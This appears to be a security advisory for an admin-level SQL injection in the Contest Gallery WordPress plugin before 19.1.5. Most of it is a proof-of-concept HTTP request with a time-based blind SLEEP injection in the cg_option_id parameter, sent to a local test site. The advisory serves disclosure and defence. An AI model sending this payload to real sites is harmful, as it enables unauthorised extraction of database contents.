Contest Gallery < 19.1.5 - Admin+ SQL Injection

The plugins do not escape the cg_option_id POST parameter before concatenating it to an SQL query in export-votes-all.php. This may allow malicious users with administrator privileges (i.e. on multisite WordPress configurations) to leak sensitive information from the site’s database.

PoC

POST /wp-admin/admin.php?page=contest-gallery/index.php&option;_id=1&cg;_export_votes=true HTTP/1.1 Host: localhost:8080 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:106.0) Gecko/20100101 Firefox/106.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://localhost:8080/wp-admin/admin.php?page=contest-gallery%2Findex.php Content-Type: application/x-www-form-urlencoded Content-Length: 106 Origin: http://localhost:8080 Connection: close Cookie: wordpress_37d007a56d816107ce5b52c10342db37=kaiba%7C1668483239%7CK8EB5hjVfjEvvJBQHeOyVpkJ8eKTSgY1ZwNZ9Gu6mIr%7Cafb735282dd2e1aeaff1d135419c00400e4e0e2a1d85809d6b54f126cfcd1883; wp-settings-time-2=1667954049; wordpress_test_cookie=WP%20Cookie%20check; wp_lang=en_US; wordpress_logged_in_37d007a56d816107ce5b52c10342db37=kaiba%7C1668483239%7CK8EB5hjVfjEvvJBQHeOyVpkJ8eKTSgY1ZwNZ9Gu6mIr%7C7ebf6c23f43d24912558008e7e934286452154ec3874ac04b09a1f136b885df3; wp-settings-1=mfold%3Do%26libraryContent%3Dbrowse; wp-settings-time-1=1668310439 Upgrade-Insecure-Requests: 1 Sec-Fetch-Dest: document Sec-Fetch-Mode: navigate Sec-Fetch-Site: same-origin Sec-Fetch-User: ?1 cg_export_votes=true&cg;_export_votes_all=true&cg;_option_id=1+AND+(SELECT+7394+FROM+(SELECT(SLEEP(3)))UrUZ)